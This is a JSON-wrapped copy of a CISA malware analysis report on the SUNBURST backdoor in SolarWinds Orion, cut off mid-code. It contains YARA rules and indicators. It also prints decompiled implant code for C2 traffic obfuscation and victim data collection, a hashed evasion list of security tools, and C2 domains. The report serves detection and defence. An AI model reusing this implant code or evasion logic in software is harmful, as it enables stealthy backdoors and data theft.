{
	"id": "0ab75a5c-a76d-4301-b102-d88d97fa7948",
	"created_at": "2026-04-06T00:06:32.600657Z",
	"updated_at": "2026-04-10T13:13:10.655134Z",
	"deleted_at": null,
	"sha1_hash": "5ffae5b175dbc71065f303731692e314324726cb",
	"title": "MAR-10318845-1.v1 - SUNBURST | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138650,
	"plain_text": "MAR-10318845-1.v1 - SUNBURST | CISA\r\nPublished: 2021-04-15 · Archived: 2026-04-05 15:44:40 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise\r\nof SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST.\r\nAfter being delivered as part of certain SolarWinds updates, a trojanized version of the\r\n“solarwinds.orion.core.businesslayer.dll” containing SUNBURST malware is installed by a legitimate SolarWinds installer\r\napplication. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to\r\nexecute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The\r\nembedded SUNBURST code encrypts its outbound communications to the remote operator using XOR encryption and\r\nmodified Base64 encoding. To maintain a low profile, the SUNBURST code will not run if it detects certain security\r\nsoftware running on the target system.\r\nFor a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix.\r\nSubmitted Files (4)\r\n019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business...)\r\n32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business...)\r\nce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business...)\r\nd0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H...)\r\nDomains (1)\r\navsvmcloud.com\r\nFindings\r\n32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1011032 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 b91ce2fa41029f6955bff20079468448\r\nSHA1 76640508b1e7759e548771a5359eaed353bf1eec\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 1 of 30\n\nSHA256 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nSHA512 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e\r\nssdeep 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD\r\nEntropy 5.582827\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.AO\r\nBitDefender Trojan.Sunburst.A\r\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/Trojan.BCCG-2955\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxjk\r\nSophos Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst!gen1\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVir.IT eXplorer Trojan.Win32.SunBurst.A\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Backdoor.Sunburst.Win32.2\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 2 of 30\n\nMD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2\r\ncommunications. This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 3 of 30\n\nstrings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\n       $an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n       $r = \"C07NzXTKz0kBAA==\" wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = \"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2020-03-24 04:52:34-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 4 of 30\n\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2019.4.5200.9083\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n9f1dcf8b4df81fdd1e33e8157fb58d9f header 512 2.890704\r\nac9dc455a67c7f2c9f10725d66c115d1 .text 1001472 5.569219\r\n69a064c0b6001299af109ed0d06f6c6f .rsrc 1536 3.015713\r\n275a7e1f11b8e5fefa163e47c22129b4 .reloc 512 0.101910\r\nRelationships\r\n32519b85c0... Connected_To avsvmcloud.com\r\n32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nDescription\r\nThis file is a 32-bit .NET DLL named \"SolarWinds.Orion.Core.BusinessLayer.dll.\" It is a modified SolarWinds-signed\r\nplugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious\r\nfile was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered\r\ncompromised.\r\n--Begin Digital Certificate Information--\r\nSigner:     CN=\"Solarwinds Worldwide, LLC\", O=\"Solarwinds Worldwide, LLC\", L=Austin, S=Texas, C=US\r\nIssuer:     CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation,\r\nC=US\r\nSN:         0FE973752022A606ADF2A36E345DC0ED\r\nNot Before: 1/20/2020 7:00:00 PM\r\nNot After: 1/20/2023 6:59:59 PM\r\nThumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4\r\nStatus:     Valid\r\nStatusMsg: Signature verified.\r\n--End Digital Certificate Information--\r\nSUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.\r\n- Sets a 12 to 14 day delayed execution time\r\n- Stealth\r\n- Command and Control (C2) communication\r\n- Collect system information\r\n- Upload system information from the victim system\r\n- Run specified tasks\r\n- Terminate processes\r\n- Download, read, write, move, delete, and execute files\r\n- Compute file hashes\r\n- Reboot the system\r\n- Adjust process privileges\r\n**DELAYED EXECUTION**\r\nSUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins.\r\nOnce installed, it compares its last write time to a randomly generated value between 288 and 336 hours (12 - 14 days) after\r\nthe file was written. The malware will sleep until this calculated time frame has passed, after which, the malware will begin\r\nC2 sessions to retrieve and execute commands or \"Jobs” on behalf of the adversary.\r\n**STEALTH**\r\nSUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 5 of 30\n\nantivirus software components running as processes, services, and drivers. It utilizes a modified version of the FNV-1a hash\r\nalgorithm to determine if specific processes are running on the target system. It will enumerate and hash the process names\r\nof all running processes and compare the generated hashes to a hard-coded blocklist. If no block-listed processes are found,\r\nit will attempt to resolve the domain \"api.solarwinds.com\" to test for network connectivity. If a block-listed process is found,\r\nit does not proceed with its C2 session. This evasion technique is used to keep it from being detected. The hard coded\r\nhashed process names are stored in an unsigned LONG list named \"assemblyTimeStamps.\" See “**BLOCK LIST\r\nCHECKING FUNCTIONS**” below in this report for details.\r\n--Begin hard-coded list of block-listed processes and names--\r\n1475579823244607677         100-continue\r\n2734787258623754862         accept\r\n1368907909245890092         afwserv\r\n16858955978146406642        apac.lab\r\n2597124982561782591         apimonitor-x64\r\n2600364143812063535         apimonitor-x86\r\n6195833633417633900         aswengsrv\r\n2934149816356927366         aswidsagent\r\n13029357933491444455        aswidsagenta\r\n15194901817027173566        atrsdfw.sys\r\n4821863173800309721         autopsy\r\n13464308873961738403        autopsy64\r\n3320026265773918739         autoruns\r\n12969190449276002545        autoruns64\r\n10657751674541025650        autorunsc\r\n12094027092655598256        autorunsc64\r\n2760663353550280147         avastavwrapper\r\n8146185202538899243         avastsvc\r\n11818825521849580123        avastui\r\n11109294216876344399        avgadminclientservice\r\n2797129108883749491         avgidsagent\r\n3660705254426876796         avgsvc\r\n3890794756780010537         avgsvca\r\n3890769468012566366         avgsvcx\r\n12709986806548166638        avgui\r\n14095938998438966337        avgwdsvcx\r\n13611051401579634621        avp\r\n18147627057830191163        avpui\r\n16423314183614230717        bccavsvc\r\n11913842725949116895        binaryninja\r\n5449730069165757263         blacklight\r\n12679195163651834776        brcow_x_x_x_x.sys\r\n1614465773938842903         brfilter.sys\r\n11385275378891906608        carbonblack\r\n13693525876560827283        carbonblackk\r\n17204844226884380288        cavp\r\n5984963105389676759         cb\r\n17849680105131524334        cbcomms\r\n18246404330670877335        cbstream\r\n292198192373389586            cff explorer\r\n14226582801651130532        close\r\n11266044540366291518        connection\r\n6116246686670134098         content-type\r\n10734127004244879770        cork.lab\r\n18159703063075866524        crexecprev.sys\r\n11771945869106552231        csagent\r\n9234894663364701749         csdevicecontrol\r\n9061219083560670602         csfalconcontainer\r\n8698326794961817906         csfalconservice\r\n12790084614253405985        cutter\r\n16570804352575357627        cve.sys\r\n17097380490166623672        cybkerneltracker.sys\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 6 of 30\n\n16066522799090129502        date\r\n5219431737322569038         de4dot\r\n15535773470978271326        debugview\r\n11073283311104541690        dev.local\r\n3626142665768487764         dgdmk.sys\r\n7810436520414958497         diskmon\r\n4030236413975199654         dmz.local\r\n13316211011159594063        dnsd\r\n13825071784440082496        dnspy\r\n14480775929210717493        dotpeek32\r\n14482658293117931546        dotpeek64\r\n8473756179280619170         dumpcap\r\n15587050164583443069        eamonm\r\n12718416789200275332        eaw.sys\r\n9559632696372799208         eelam\r\n607197993339007484            egui\r\n14513577387099045298        eguiproxy\r\n4931721628717906635         ehdrv\r\n14079676299181301772        ekbdflt\r\n3200333496547938354         ekrn\r\n2589926981877829912         ekrnepfw\r\n8727477769544302060         emea.sales\r\n17939405613729073960        epfw\r\n17997967489723066537        epfwwfp\r\n3778500091710709090         evidence center\r\n8799118153397725683         exeinfope\r\n8873858923435176895         expect\r\n13783346438774742614        f-secure filter\r\n16112751343173365533        f-secure gatekeeper\r\n17624147599670377042        f-secure gatekeeper handler starter\r\n3425260965299690882         f-secure hips\r\n16066651430762394116        f-secure network request broker\r\n2380224015317016190         f-secure recognizer\r\n13655261125244647696        f-secure webui daemon\r\n12027963942392743532        fakedns\r\n576626207276463000            fakenet\r\n9384605490088500348         fe_avk\r\n15092207615430402812        feelam\r\n6274014997237900919         fekern\r\n3320767229281015341         fewscservice\r\n7412338704062093516         ffdec\r\n682250828679635420            fiddler\r\n13014156621614176974        fileinsight\r\n18150909006539876521        floss\r\n5587557070429522647         fnrb32\r\n12445177985737237804        fsaua\r\n12445232961318634374        fsaus\r\n17017923349298346219        fsav32\r\n9333057603143916814         fsbts\r\n541172992193764396            fsdevcon\r\n10393903804869831898        fsdfw\r\n3413052607651207697         fses\r\n3407972863931386250         fsfw\r\n10545868833523019926        fsgk32\r\n521157249538507889            fsgk32st\r\n3421213182954201407         fsma\r\n15039834196857999838        fsma32\r\n3421197789791424393         fsms\r\n3413886037471417852         fsni\r\n17978774977754553159        fsorsp\r\n14243671177281069512        fsorspclient\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 7 of 30\n\n14055243717250701608        fssm32\r\n7315838824213522000         fsvista\r\n14971809093655817917        fswebuid\r\n10336842116636872171        gdb\r\n6943102301517884811         groundling32.sys\r\n13544031715334011032        groundling64.sys\r\n397780960855462669            hexisfsmonitor.sys\r\n13260224381505715848        hiew32\r\n12785322942775634499        hiew32demo\r\n17956969551821596225        hollows_hunter\r\n14256853800858727521        idaq\r\n8709004393777297355         idaq64\r\n8129411991672431889         idr\r\n15514036435533858158        if-modified-since\r\n15997665423159927228        ildasm\r\n10829648878147112121        ilspy\r\n9149947745824492274         jd-gui\r\n13852439084267373191        keep-alive\r\n17633734304611248415        ksde\r\n13581776705111912829        ksdeui\r\n4578480846255629462         lab.brno\r\n8381292265993977266         lab.local\r\n3796405623695665524         lab.na\r\n5942282052525294911         lab.rio\r\n17984632978012874803        libwamf.sys\r\n3656637464651387014         lordpe\r\n2717025511528702475         lragentmf.sys\r\n10501212300031893463        microsoft.tri.sensor\r\n155978580751494388            microsoft.tri.sensor.updater\r\n5183687599225757871         msmpeng\r\n10063651499895178962        mssense\r\n3575761800716667678         officemalscanner\r\n4501656691368064027         ollydbg\r\n7701683279824397773         pci.local\r\n10296494671777307979        pdfstreamdumper\r\n14630721578341374856        pe-bear\r\n6461429591783621719         pe-sieve32\r\n6508141243778577344         pe-sieve64\r\n4088976323439621041         pebrowse64\r\n9531326785919727076         peid\r\n10235971842993272939        pestudio\r\n2478231962306073784         peview\r\n9903758755917170407         pexplorer\r\n14710585101020280896        ppee\r\n2810460305047003196         procdump\r\n13611814135072561278        procdump64\r\n2032008861530788751         processhacker\r\n6491986958834001955         procexp\r\n27407921587843457             procexp64\r\n2128122064571842954         procmon\r\n10484659978517092504        prodiscoverbasic\r\n2532538262737333146         psanhost\r\n835151375515278827            psepfilter.sys\r\n6088115528707848728         psuamain\r\n4454255944391929578         psuaservice\r\n8478833628889826985         py2exedecompiler\r\n10463926208560207521        r2agent\r\n7080175711202577138         rabin2\r\n8697424601205169055         radare2\r\n16130138450758310172        ramcapture\r\n7775177810774851294         ramcapture64\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 8 of 30\n\n700598796416086955            redcloak\r\n9007106680104765185         referer\r\n506634811745884560            reflector\r\n18294908219222222902        regmon\r\n3588624367609827560         resourcehacker\r\n9555688264681862794         retdec-ar-extractor\r\n5415426428750045503         retdec-bin2llvmir\r\n3642525650883269872         retdec-bin2pat\r\n13135068273077306806        retdec-config\r\n3769837838875367802         retdec-fileinfo\r\n191060519014405309            retdec-getsig\r\n1682585410644922036         retdec-idr2pat\r\n7878537243757499832         retdec-llvmir2hll\r\n13799353263187722717        retdec-macho-extractor\r\n1367627386496056834         retdec-pat2yara\r\n12574535824074203265        retdec-stacofin\r\n16990567851129491937        retdec-unpacker\r\n8994091295115840290         retdec-yarac\r\n13876356431472225791        rundotnetdll\r\n18392881921099771407        rvsavd.sys\r\n5132256620104998637         saas.swi\r\n11801746708619571308        safe-agent.sys\r\n14968320160131875803        sbiesvc\r\n14868920869169964081        scdbg\r\n106672141413120087            scylla_x64\r\n79089792725215063             scylla_x86\r\n16335643316870329598        sense\r\n12343334044036541897        sentinelmonitor.sys\r\n5614586596107908838         shellcode_launcher\r\n17291806236368054941        solarwinds.businesslayerhost\r\n3869935012404164040         solarwindsdiagnostics\r\n15267980678929160412        swdev.dmz\r\n1109067043404435916         swdev.local\r\n14111374107076822891        sysmon\r\n3538022140597504361         sysmon64\r\n7175363135479931834         tanium\r\n3178468437029279937         taniumclient\r\n13599785766252827703        taniumdetectengine\r\n6180361713414290679         taniumendpointindex\r\n8612208440357175863         taniumtracecli\r\n8408095252303317471         taniumtracewebsocketclient64\r\n7982848972385914508         task explorer\r\n8760312338504300643         task explorer-64\r\n17351543633914244545        tcpdump\r\n7516148236133302073         tcpvcon\r\n15114163911481793350        tcpview\r\n7574774749059321801         user-agent\r\n15457732070353984570        vboxservice\r\n16292685861617888592        win32_remote\r\n10374841591685794123        win64_remotex64\r\n3045986759481489935         windbg\r\n917638920165491138            windefend\r\n17109238199226571972        windump\r\n5945487981219695001         winhex\r\n6827032273910657891         winhex64\r\n8052533790968282297         winobj\r\n17574002783607647274        wireshark\r\n3341747963119755850         x32dbg\r\n14193859431895170587        x64dbg\r\n15695338751700748390        xagt\r\n640589622539783622            xagtnotif\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 9 of 30\n\n17683972236092287897        xwforensics\r\n17439059603042731363        xwforensics64\r\n--End hard-coded list of block-listed processes and names--\r\n**COMMAND AND CONTROL**\r\nDuring runtime, SUNBURST hashes its own parent process name, and compares it to the value 17291806236368054941. If\r\nit does not match, the malicious class “OrionImprovementBusinessLayer” will stop executing and the DLL will continue\r\nnormal activity.\r\nWhen communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network\r\nactivity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated “customer\r\nID\" that allows the adversary to track different compromised systems.\r\nTo establish C2, it will construct and resolve the subdomains of \"avsvmcloud.com\" using a domain generation algorithm\r\n(DGA). The following format is used to generate the domain name:\r\n--Begin format of the domain name--\r\n.appsync-api.eu-west-1.avsvmcloud.com\r\n.appsync-api.us-west-2.avsvmcloud.com\r\n.appsync-api.us-east-1.avsvmcloud.com\r\n.appsync-api.us-east-2.avsvmcloud.com\r\n--End format of the domain name--\r\nIt will attempt to make a Canonical Name (CNAME) query according to different third-level domain names in combination\r\nwith the DGA to verify the C2 server is accessible before executing its command control session.\r\n--Begin domain names combined with DGA--\r\n6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com\r\n7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com\r\ngq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com\r\nihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com\r\nk5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com\r\nmhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com\r\n--End domain names plus DGA--\r\nOutbound communications are encrypted using an embedded class named “CryptoHelper.” The class contains two functions\r\nnamed “CreateSecureString” and “Base64Encode.” The function “CreateSecureString” creates a random byte and then\r\nutilizes this random byte to encode the string provided. The randomly generated byte, used as the XOR key, will be stored at\r\noffset 0x00 of the encoded string -- allowing the adversary to decrypt the traffic received from this implant. The function\r\n“CreateSecureString” takes two arguments, a byte array which will be the data targeted for encryption and a bool variable. If\r\nthis variable is set to \"true\" the function will “OR” the generated “XOR” key byte with the value 128 before using it to XOR\r\nencode the provided data. It then calls the Base64Encode function to further obfuscate the communication.\r\n--Begin CreateSecureString Function--\r\nprivate static string CreateSecureString(byte[] data, bool flag)\r\n       {\r\n           byte[] bytes = new byte[data.Length + 1];\r\n           bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue);\r\n           if (flag)\r\n               bytes[0] |= (byte)128;\r\n           for (int index = 1; index \u0026lt; bytes.Length; ++index)\r\n               bytes[index] = (byte)((uint)data[index - 1] ^ (uint)bytes[0]);\r\n           return Base64Encode(bytes, true);\r\n       }\r\n--End CreateSecureString Function--\r\nThe Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet,\r\n\"ph2eifo3n5utg1j8d94qrvbmk0sal76c.” This custom Base64 encoding makes it harder to interpret network traffic sent\r\nbetween this malicious implant and the remote C2 server. The custom Base64 alphabet and algorithm utilized would be\r\nrequired to decode the network traffic.\r\n--Begin Base64Encode Function--\r\nprivate static string Base64Encode(byte[] bytes, bool rt)\r\n    {\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 10 of 30\n\nstring str1 =\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(\"K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==\");\r\n       string str2 = \"\";\r\n       uint num1 = 0;\r\n       int num2 = 0;\r\n       foreach (byte num3 in bytes)\r\n       {\r\n        num1 |= (uint) num3 \u0026lt;\u0026lt; num2;\r\n        for (num2 += 8; num2 \u0026gt;= 5; num2 -= 5)\r\n        {\r\n           str2 += str1[(int) num1 \u0026amp; 31].ToString();\r\n           num1 \u0026gt;\u0026gt;= 5;\r\n        }\r\n       }\r\n       if (num2 \u0026gt; 0)\r\n       {\r\n        if (rt)\r\n           num1 |= (uint) (new Random().Next() \u0026lt;\u0026lt; num2);\r\n        str2 += str1[(int) num1 \u0026amp; 31].ToString();\r\n       }\r\n       return str2;\r\n    }\r\n--End Base64Encode Function--\r\n**COLLECT SYSTEM INFORMATION**\r\nThe collection of system description info is carried out by the CollectSystemDescription function.\r\nIt will collect the following information:\r\nVictim domain SID\r\nDomain name\r\nHostname\r\nUsername\r\nOperating System (OS) version\r\nSystem directory\r\nEnvironment tick count - the time since the system was last rebooted.\r\npublic static void CollectSystemDescription(string info, out string result)\r\n{\r\nresult = (string) null;\r\nint i = 0;\r\nstring domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\ndomainName;\r\ntry\r\n{\r\nstring str = ((SecurityIdentifier) new NTAccount(domainName,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof\r\n(SecurityIdentifier))).AccountDomainSid.ToString();\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nstr;\r\n}\r\ncatch\r\n{\r\nresult += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);\r\n}\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nIPGlobalProperties.GetIPGlobalProperties().HostName;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) 